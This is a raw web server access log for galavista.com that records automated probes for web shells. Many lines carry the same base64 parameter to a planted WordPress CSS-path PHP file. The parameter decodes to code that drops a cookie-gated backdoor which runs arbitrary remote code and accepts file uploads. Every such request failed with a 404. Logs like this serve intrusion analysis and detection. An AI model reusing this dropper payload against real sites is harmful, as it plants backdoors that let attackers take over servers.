194.68.32.135 - - [01/Dec/2025:15:54:12 +0000] "POST /mah.php?upload HTTP/1.1" 404 1251 "http://galavista.com/" "Mozilla/5.0 (X11; Linux x86_64; rv:47.0) Gecko/20100101 Firefox/47.0"
194.68.32.135 - - [01/Dec/2025:15:54:15 +0000] "POST /chosen.php?upload HTTP/1.1" 404 1251 "http://galavista.com/mah.php?upload" "Mozilla/5.0 (X11; Linux x86_64; rv:47.0) Gecko/20100101 Firefox/47.0"
194.68.32.135 - - [01/Dec/2025:15:54:25 +0000] "POST /goods.php?upload HTTP/1.1" 404 1251 "http://galavista.com/chosen.php?upload" "Mozilla/5.0 (X11; Linux x86_64; rv:47.0) Gecko/20100101 Firefox/47.0"
198.186.131.59 - - [01/Dec/2025:15:26:10 +0000] "GET /ee0876bf4e72.php HTTP/1.1" 404 1251 "http://galavista.com/wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2VlMDg3NmJmNGU3Mi5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs=" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2817.28 Safari/537.36"
194.68.32.135 - - [01/Dec/2025:15:54:26 +0000] "GET /ee0876bf4e72.php HTTP/1.1" 404 1251 "http://galavista.com/wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2VlMDg3NmJmNGU3Mi5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs=" "Mozilla/5.0 (X11; Linux x86_64; rv:47.0) Gecko/20100101 Firefox/47.0"
198.186.131.59 - - [01/Dec/2025:16:03:54 +0000] "POST /goods.php?upload HTTP/1.1" 404 1251 "http://galavista.com/chosen.php?upload" "Mozilla/5.0 (X11; Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2725.36 Safari/537.36"
43.157.156.190 - - [01/Dec/2025:16:19:26 +0000] "GET / HTTP/1.1" 200 1502 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
192.121.16.196 - - [01/Dec/2025:16:21:26 +0000] "GET / HTTP/1.1" 200 1495 "-" "Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0"
192.121.16.196 - - [01/Dec/2025:16:21:27 +0000] "POST /mah.php?upload HTTP/1.1" 404 1251 "http://galavista.com/" "Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0"
192.121.16.196 - - [01/Dec/2025:16:21:27 +0000] "POST /chosen.php?upload HTTP/1.1" 404 1251 "http://galavista.com/mah.php?upload" "Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0"
192.121.16.196 - - [01/Dec/2025:16:21:27 +0000] "POST /goods.php?upload HTTP/1.1" 404 1251 "http://galavista.com/chosen.php?upload" "Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0"
192.121.16.196 - - [01/Dec/2025:16:21:27 +0000] "GET /wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2VlMDg3NmJmNGU3Mi5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs= HTTP/1.1" 404 1251 "http://galavista.com/goods.php?upload" "Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0"
192.121.16.196 - - [01/Dec/2025:16:21:28 +0000] "GET /ee0876bf4e72.php HTTP/1.1" 404 1251 "http://galavista.com/wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2VlMDg3NmJmNGU3Mi5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs=" "Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0"
194.68.32.135 - - [01/Dec/2025:16:29:46 +0000] "POST /chosen.php?upload HTTP/1.1" 404 1251 "http://galavista.com/mah.php?upload" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2629.28 Safari/537.36"
194.68.32.135 - - [01/Dec/2025:16:29:46 +0000] "POST /goods.php?upload HTTP/1.1" 404 1251 "http://galavista.com/chosen.php?upload" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2629.28 Safari/537.36"
194.68.32.135 - - [01/Dec/2025:16:29:57 +0000] "GET /ee0876bf4e72.php HTTP/1.1" 404 1251 "http://galavista.com/wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2VlMDg3NmJmNGU3Mi5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs=" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2629.28 Safari/537.36"
45.227.253.15 - - [01/Dec/2025:16:32:08 +0000] "GET /index.php/jk HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0"
192.121.16.196 - - [01/Dec/2025:16:39:18 +0000] "GET / HTTP/1.1" 200 1494 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2829.54 Safari/537.36"
192.121.16.196 - - [01/Dec/2025:16:39:26 +0000] "POST /mah.php?upload HTTP/1.1" 404 1251 "http://galavista.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2829.54 Safari/537.36"
192.121.16.196 - - [01/Dec/2025:16:39:26 +0000] "POST /chosen.php?upload HTTP/1.1" 404 1251 "http://galavista.com/mah.php?upload" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2829.54 Safari/537.36"
192.121.16.196 - - [01/Dec/2025:16:39:34 +0000] "GET /wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2VlMDg3NmJmNGU3Mi5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs= HTTP/1.1" 404 1251 "http://galavista.com/goods.php?upload" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2829.54 Safari/537.36"
192.121.16.196 - - [01/Dec/2025:16:39:34 +0000] "GET /ee0876bf4e72.php HTTP/1.1" 404 1251 "http://galavista.com/wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2VlMDg3NmJmNGU3Mi5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs=" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2829.54 Safari/537.36"
194.68.32.135 - - [01/Dec/2025:16:49:29 +0000] "POST /chosen.php?upload HTTP/1.1" 404 1251 "http://galavista.com/mah.php?upload" "Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64; rv:46.0) Gecko/20100101 Firefox/46.0"
194.68.32.135 - - [01/Dec/2025:16:49:29 +0000] "POST /goods.php?upload HTTP/1.1" 404 1251 "http://galavista.com/chosen.php?upload" "Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64; rv:46.0) Gecko/20100101 Firefox/46.0"
198.186.131.59 - - [01/Dec/2025:16:03:23 +0000] "GET / HTTP/1.1" 200 1493 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2725.36 Safari/537.36"
198.186.131.59 - - [01/Dec/2025:16:03:24 +0000] "POST /mah.php?upload HTTP/1.1" 404 1251 "http://galavista.com/" "Mozilla/5.0 (X11; Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2725.36 Safari/537.36"
198.186.131.59 - - [01/Dec/2025:16:03:24 +0000] "POST /chosen.php?upload HTTP/1.1" 404 1251 "http://galavista.com/mah.php?upload" "Mozilla/5.0 (X11; Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2725.36 Safari/537.36"
198.186.131.59 - - [01/Dec/2025:16:12:01 +0000] "GET / HTTP/1.1" 200 1496 "-" "Mozilla/5.0 (Windows NT 6.2; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0"
198.186.131.59 - - [01/Dec/2025:16:12:02 +0000] "POST /mah.php?upload HTTP/1.1" 404 1251 "http://galavista.com/" "Mozilla/5.0 (Windows NT 6.2; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0"
198.186.131.59 - - [01/Dec/2025:16:12:19 +0000] "POST /chosen.php?upload HTTP/1.1" 404 1251 "http://galavista.com/mah.php?upload" "Mozilla/5.0 (Windows NT 6.2; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0"
198.186.131.59 - - [01/Dec/2025:16:12:31 +0000] "POST /goods.php?upload HTTP/1.1" 404 1251 "http://galavista.com/chosen.php?upload" "Mozilla/5.0 (Windows NT 6.2; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0"
198.186.131.59 - - [01/Dec/2025:16:12:31 +0000] "GET /wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2VlMDg3NmJmNGU3Mi5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs= HTTP/1.1" 404 1251 "http://galavista.com/goods.php?upload" "Mozilla/5.0 (Windows NT 6.2; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0"
198.186.131.59 - - [01/Dec/2025:16:12:32 +0000] "GET /ee0876bf4e72.php HTTP/1.1" 404 1251 "http://galavista.com/wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2VlMDg3NmJmNGU3Mi5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs=" "Mozilla/5.0 (Windows NT 6.2; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0"
43.157.147.3 - - [01/Dec/2025:16:33:23 +0000] "GET /19055/ HTTP/1.1" 200 1874 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
192.121.16.196 - - [01/Dec/2025:16:39:34 +0000] "POST /goods.php?upload HTTP/1.1" 404 1251 "http://galavista.com/chosen.php?upload" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2829.54 Safari/537.36"
43.166.238.12 - - [01/Dec/2025:16:44:34 +0000] "GET /assets/ HTTP/1.1" 200 748 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
194.68.32.135 - - [01/Dec/2025:16:49:30 +0000] "GET /wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2VlMDg3NmJmNGU3Mi5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs= HTTP/1.1" 404 1251 "http://galavista.com/goods.php?upload" "Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64; rv:46.0) Gecko/20100101 Firefox/46.0"
194.68.32.135 - - [01/Dec/2025:16:49:30 +0000] "GET /ee0876bf4e72.php HTTP/1.1" 404 1251 "http://galavista.com/wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2VlMDg3NmJmNGU3Mi5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs=" "Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64; rv:46.0) Gecko/20100101 Firefox/46.0"
216.73.216.189 - - [01/Dec/2025:16:50:33 +0000] "GET /_autoindex/assets/js/tablesort.js HTTP/1.1" 200 2137 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
198.186.131.59 - - [01/Dec/2025:16:03:54 +0000] "GET /wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2VlMDg3NmJmNGU3Mi5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs= HTTP/1.1" 404 1251 "http://galavista.com/goods.php?upload" "Mozilla/5.0 (X11; Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2725.36 Safari/537.36"
198.186.131.59 - - [01/Dec/2025:16:03:54 +0000] "GET /ee0876bf4e72.php HTTP/1.1" 404 1251 "http://galavista.com/wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2VlMDg3NmJmNGU3Mi5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs=" "Mozilla/5.0 (X11; Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2725.36 Safari/537.36"
216.73.216.189 - - [01/Dec/2025:16:04:16 +0000] "GET /robots.txt HTTP/1.1" 404 1251 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:16:04:16 +0000] "GET / HTTP/1.1" 200 1265 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
194.68.32.135 - - [01/Dec/2025:16:29:41 +0000] "GET / HTTP/1.1" 200 1494 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2629.28 Safari/537.36"
194.68.32.135 - - [01/Dec/2025:16:29:43 +0000] "POST /mah.php?upload HTTP/1.1" 404 1251 "http://galavista.com/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2629.28 Safari/537.36"
194.68.32.135 - - [01/Dec/2025:16:29:46 +0000] "GET /wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2VlMDg3NmJmNGU3Mi5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs= HTTP/1.1" 404 1251 "http://galavista.com/goods.php?upload" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2629.28 Safari/537.36"
194.68.32.135 - - [01/Dec/2025:16:49:05 +0000] "GET / HTTP/1.1" 200 1496 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64; rv:46.0) Gecko/20100101 Firefox/46.0"
194.68.32.135 - - [01/Dec/2025:16:49:05 +0000] "POST /mah.php?upload HTTP/1.1" 404 1251 "http://galavista.com/" "Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64; rv:46.0) Gecko/20100101 Firefox/46.0"
194.68.32.135 - - [01/Dec/2025:16:58:16 +0000] "GET / HTTP/1.1" 200 1496 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:46.0) Gecko/20100101 Firefox/46.0"
